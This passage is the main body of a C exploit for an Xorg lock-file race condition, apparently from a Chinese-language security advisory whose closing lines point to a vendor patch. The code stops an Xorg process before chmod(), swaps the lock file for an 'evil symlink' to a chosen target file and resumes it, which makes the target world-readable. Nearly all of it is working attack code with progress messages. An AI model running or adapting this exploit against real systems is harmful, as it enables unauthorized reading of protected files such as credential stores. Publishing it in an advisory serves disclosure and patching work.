/* we must ensure that Xorg is not already running on this display */
if (stat(lockfile, &st) == 0) {
printf("[-] %s exists, maybe Xorg is already running on this"
" display? Choose another display by editing the DISPLAY"
" attributes.\n", lockfile);
return 1;
}
/* this avoid execution to continue (and automatically switch to another
* TTY). Xorg quits with fatal error because the file that /tmp/.X?-lock
* links does not exist.
*/
symlink("/dontexist", lockfile);
/* we have to force this mask to not comprise our later checks */
umask(077);
ttyno = get_tty_number();
printf("[+] Trying to stop a Xorg process right before chmod()\n");
while (--current_attempt) {
proc = launch_xorg_instance();
n = 0;
while (n++ < 10000)
if ((ret = syscall(SYS_stat, lockfiletmp, &st)) == 0)
break;
if (ret == 0) {
syscall(SYS_kill, proc, SIGSTOP);
printf("[+] Process ID %d stopped (SIGSTOP sent)\n", proc);
stat(lockfiletmp, &st);
if ((st.st_mode & 4) == 0)
break;
printf("[-] %s file has wrong rights (%o)\n"
"[+] removing it by launching another Xorg process\n",
lockfiletmp, st.st_mode);
launch_xorg_instance();
sleep(7);
}
kill(proc, SIGKILL);
}
if (current_attempt == 0) {
printf("[-] Attack failed.\n");
if (!ttyno)
printf("Try with console ownership: switch to a TTY* by using "
"Ctrl-Alt-F[1-6] and try again.\n");
return 1;
}
printf("[+] Removing %s by launching another Xorg process\n",
lockfiletmp);
launch_xorg_instance();
sleep(7);
if (stat(lockfiletmp, &st) == 0) {
printf("[-] %s lock file still here... :(\n", lockfiletmp);
return 1;
}
printf("[+] Creating evil symlink (%s -> %s)\n", lockfiletmp,
target_file);
symlink(target_file, lockfiletmp);
printf("[+] Process ID %d resumed (SIGCONT sent)\n", proc);
kill(proc, SIGCONT);
/* wait for chmod() to finish */
usleep(300000);
stat(target_file, &st);
if (!(st.st_mode & 004)) {
printf("[-] Attack failed, rights are %o. Try again!\n", st.st_mode);
return 1;
}
/* cleaning temporary link */
unlink(lockfile);
printf("[+] Attack succeeded, ls -l %s:\n", target_file);
show_target_file(target_file);
return 0;
}
建议:
--------------------------------------------------------------------------------
厂商补丁:
X.org
-----
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载: